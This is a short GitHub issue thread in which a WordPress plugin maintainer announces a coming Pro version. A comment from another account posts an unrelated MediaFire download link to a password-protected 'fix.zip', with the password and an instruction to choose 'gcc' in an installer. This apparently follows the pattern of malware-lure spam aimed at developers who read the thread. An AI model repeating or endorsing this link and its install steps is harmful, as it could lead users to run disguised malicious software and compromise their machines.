### ISSUE TITLE
Pro version coming soon

### ISSUE THREAD

**Issue by devuri** [devuri/wp-filename-hasher#13]
Pro Version is currently in development! The Pro Version will introduce a range of advanced features and enhancements that will take  While the current free version offers robust file handling capabilities, the Pro Version will include premium tools designed for more sophisticated site management and customization.

> https://github.com/devuri/wp-filename-hasher-pro

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
